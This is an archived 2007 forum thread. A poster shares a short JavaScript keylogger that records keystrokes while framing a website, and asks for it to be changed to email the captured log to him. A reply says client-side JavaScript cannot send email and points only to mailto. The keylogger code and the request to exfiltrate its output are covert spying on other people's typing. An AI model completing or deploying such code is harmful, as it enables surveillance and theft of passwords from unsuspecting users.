PDA

View Full Version : Help with a new javascript keylogger code


Zork
04-07-2007, 05:34 PM
I need help, could someone please edit the following js code so that it will email me the log instead, thanks.


<script>
var keylog='Capturing: ';
document.onkeypress = function () {
window.status = keylog += String.fromCharCode(window.event.keyCode); }
</script>

<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.mywebsite.com" scrolling="auto">
</frameset>

ken_shoti
04-08-2007, 04:50 AM
you're posting in JavaScript forum...
javascript cannot email data or information to your email...this needs a serverside language to do this things...

but you may want the mailto feature..but i believe many are using web-based email